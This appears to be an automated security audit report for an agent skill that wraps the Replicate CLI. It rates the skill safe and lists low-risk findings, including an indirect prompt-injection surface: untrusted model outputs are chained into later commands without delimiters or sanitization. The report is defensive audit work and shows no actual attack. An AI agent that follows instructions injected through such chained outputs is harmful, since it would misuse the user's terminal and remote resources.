replicate-cli
Pass
Audited by Gen Agent Trust Hub on Feb 21, 2026
Risk Level: SAFECOMMAND_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
- Command Execution (LOW): The skill is primarily a guide for the
replicateCLI. It provides instructions for running predictions, managing models, and fine-tuning. These commands are executed in the user's terminal and can impact local and remote resources. - External Downloads (LOW): The skill recommends using
curl -Lto download model outputs from Replicate URLs. While expected for the tool's purpose, this involves downloading data from external sources. - Indirect Prompt Injection (LOW): Category 8: Indirect Prompt Injection surface detected.
- Ingestion points: Untrusted data enters the context via the
{{.output[0]}}template syntax used in the Output Chaining section ofSKILL.md. - Boundary markers: Absent; the skill does not suggest using delimiters or 'ignore' instructions when chaining model outputs.
- Capability inventory: The skill uses
replicate runandreplicate train(subprocess/CLI execution) as primary capabilities. - Sanitization: Absent; model outputs are passed directly as inputs to subsequent commands without validation.
- Dynamic Execution (LOW): The
replicate scaffoldcommand generates local project files (Node.js or Python) based on remote prediction IDs. This is a standard feature of the CLI but involves generating code from external data.
Audit Metadata